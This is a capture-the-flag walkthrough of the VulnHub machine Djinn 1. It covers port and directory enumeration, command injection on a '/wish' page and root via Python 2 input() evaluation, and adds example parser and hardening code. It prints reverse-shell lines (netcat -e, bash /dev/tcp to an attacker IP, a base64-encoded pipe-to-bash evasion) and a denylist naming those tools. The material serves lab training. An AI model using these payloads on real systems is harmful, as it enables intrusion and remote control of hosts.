Djinn 1 VulnHub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/djinn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.113
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
nmap -p- -Pn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:3A:97:CE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
The full port scan shows two more open ports, 1337 and 7331.
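The two scans above are nmap's normal text output. As an added example (not part of the original write-up), here is a small parser for that port table that pulls out port, protocol, state, service and version, skips script output and header lines, and reports which ports the full `-p-` scan found that the default top-1000 scan did not. The sample input is the page's own scan output, trimmed to the relevant lines; the function and class names are my own.

```python
import re
from typing import List, NamedTuple


class PortEntry(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# One row of nmap's normal-output port table, e.g.
#   "21/tcp open ftp vsftpd 3.0.3"   or   "22/tcp filtered ssh"
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_ports(text: str) -> List[PortEntry]:
    """Extracts port rows from nmap normal output. NSE script lines ("| ..."),
    the PORT/STATE header and the MAC/Service Info lines never match the
    pattern and are skipped."""
    entries = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m:
            port, proto, state, service, version = m.groups()
            entries.append(PortEntry(int(port), proto, state, service, (version or "").strip()))
    return entries


def diff_scans(first: str, second: str) -> List[PortEntry]:
    """Port rows present in the second scan that the first scan did not list."""
    seen = {(e.port, e.proto) for e in parse_nmap_ports(first)}
    return [e for e in parse_nmap_ports(second) if (e.port, e.proto) not in seen]


def anonymous_ftp_flagged(text: str) -> bool:
    """True when the ftp-anon NSE script reported anonymous login."""
    return "Anonymous FTP login allowed" in text


# Sample input: the two scans from this write-up, trimmed to the relevant lines.
DEFAULT_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix
"""

FULL_SCAN = """\
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:3A:97:CE (VMware)
"""


if __name__ == "__main__":
    for entry in parse_nmap_ports(DEFAULT_SCAN):
        print(entry)
    print("new in full scan:", [e.port for e in diff_scans(DEFAULT_SCAN, FULL_SCAN)])
    print("anonymous FTP:", anonymous_ftp_flagged(DEFAULT_SCAN))
```

The same parser works on the `.nmap` file that `-oA nmap/djinn` writes, so the "what did the full scan add" question can be answered without eyeballing two outputs.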
FTP
The nmap output shows that anonymous login is allowed. Let's try it:
ftp 192.168.1.110

Then we can list the directory contents with the ls command.

There are 3 files inside. Let's use the get command to download them.


The content of these 3 files:
More Discovery
Next is port 1337, which we just discovered. Let's head to the browser first.

Let's use netcat to connect to it.

It wants 1000 answers, and I don't think he will give us our gift, so let's move on to another port, 7331.

gobuster
Let's use gobuster to enumerate directories, since we can't find anything interesting on the site itself.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.110:7331/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================
Gobuster finds 2 directories, /genie and /wish.

Let's navigate to the /wish page and type id; the response shows the command output.
Reverse Shell
When I set up a listener on my Kali machine and type
nc -e /bin/bash 192.168.1.113 444
it doesn't work. We actually need to encode the command with base64 and pipe it through a decoder so that it executes.
Even then there was no luck; only the bash reverse shell works:
bash -i >& /dev/tcp/192.168.1.113/4444 0>&1
We then encode it with base64 on a website, go to our /wish page and type this:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash

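Why the plain command was refused while the base64 pipeline got through: the following is an added example, not the box's app.py (which this write-up does not reproduce). It models a naive substring denylist, shows that the encoded payload from above carries its forbidden content straight past such a filter, adds the decode-before-check step a filter would need to catch it, and then replaces the free-form shell call with a fixed allowlist, which is the actual fix. DENYLIST, ALLOWED_ACTIONS and the function names are assumptions of mine.

```python
import base64
import binascii
import re
import subprocess

# Payload from the write-up above: the encoded bash reverse shell, decoded on the box.
ENCODED_PAYLOAD = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash"

# Hypothetical substring denylist standing in for whatever the /wish handler
# checks; the real filter is not shown in the write-up.
DENYLIST = ("nc ", "/dev/tcp", ">&")


def denylist_allows(cmd: str) -> bool:
    """The naive check: refuse only if a forbidden substring appears verbatim."""
    return not any(bad in cmd for bad in DENYLIST)


B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_fragments(cmd: str) -> list:
    """Finds base64-looking tokens in the command and returns their decoded text.
    This is the inspection step the naive filter lacks."""
    found = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            found.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return found


def denylist_allows_deep(cmd: str) -> bool:
    """Applies the same denylist to the command and to anything it carries encoded."""
    return denylist_allows(cmd) and all(denylist_allows(f) for f in decoded_fragments(cmd))


# The real fix: no shell and no free-form string. A small set of named actions
# maps to fixed argv lists that run with shell=False.
ALLOWED_ACTIONS = {
    "id": ["id"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def resolve_action(cmd: str):
    """Returns the fixed argv for a permitted action, or None for anything else."""
    return ALLOWED_ACTIONS.get(cmd.strip())


def run_action(cmd: str) -> str:
    argv = resolve_action(cmd)
    if argv is None:
        raise ValueError("action not permitted: %r" % cmd)
    return subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False).stdout


if __name__ == "__main__":
    print("naive filter lets encoded payload through:", denylist_allows(ENCODED_PAYLOAD))
    print("decoded content:", decoded_fragments(ENCODED_PAYLOAD))
    print("deep check blocks it:", not denylist_allows_deep(ENCODED_PAYLOAD))
    print(run_action("id").strip())
```

Decoding embedded blobs closes this particular gap but not the underlying one: any denylist in front of os.system is a race the attacker wins eventually, which is why the allowlisted argv dispatcher is the form to keep.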
We can first run this to get a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Then we can list the directory and cat app.py.

Then we cat out the credentials.

We can su to the user nitish.

Privilege Escalation
We then type sudo -l and get this:

We can use the strings command to list all readable strings in the genie binary.

We can see there is a -cmd parameter that can be used.
After playing around, we can become the sam user by typing
sudo -u sam genie -cmd new

We then type sudo -l again.

If we run sudo /root/lago, it shows us this:

Whichever choice we enter, we still can't get past the menu.

So we navigate to the /home/sam directory to find out more. Typing ls -la shows the hidden files.

Then we can use netcat to transfer the file to our machine.
Our machine
nc -nlvp 9000 > abc.pyc
Target machine
nc -nv 192.168.1.113 9000 < .pyc
A .pyc file is compiled Python bytecode. We can use uncompyle6 to decompile it and read the source.
uncompyle6 abc.pyc
# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41)
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '

def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'

def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)

def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice

def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())
# okay decompiling abc.pyc
Because this is Python 2, input() evaluates whatever we type as an expression, so if the input is num it refers to the random number itself and the comparison succeeds: we get root!
After that, type sudo -u root /root/lago, choose option 2, and type num when it asks for a number between 1 and 100.

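To make the flaw in guessit() concrete, here is an added example (my code, not the lago script from the box) that reproduces the Python 2 behaviour of input() with an explicit eval and puts it beside a hardened check that treats the typed text as data. Function names are my own; the check is what the decompiled code does, the fix is what it should do.

```python
import random


def guessit_legacy(answer_text: str, num: int) -> bool:
    """Mirrors the decompiled guessit() comparison. In Python 2, input() is
    eval(raw_input()): the typed text is evaluated as an expression in the
    calling scope, so the bare identifier "num" resolves to the secret number
    itself and the comparison always succeeds."""
    s = eval(answer_text)  # deliberately reproduces the flaw; never do this in real code
    return s == num


def guessit_fixed(answer_text: str, num: int) -> bool:
    """Hardened check: the text is parsed, never evaluated. Only a literal
    integer inside the announced 1..100 range can compare equal."""
    try:
        guess = int(answer_text.strip())
    except ValueError:
        return False
    if not 1 <= guess <= 100:
        return False
    return guess == num


def play(check, answer_text: str) -> bool:
    """One round against a fresh secret, the way /root/lago draws one per run."""
    num = random.randint(1, 101)
    return check(answer_text, num)


if __name__ == "__main__":
    print("legacy check, typed 'num':", play(guessit_legacy, "num"))  # True on every run
    print("fixed check,  typed 'num':", play(guessit_fixed, "num"))   # False
```

On Python 3, input() already behaves like raw_input(), but the same mistake reappears whenever code calls eval() on user text; int() plus a range check is the whole fix here.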
Got root!
We then navigate to the /root directory to get the flag.
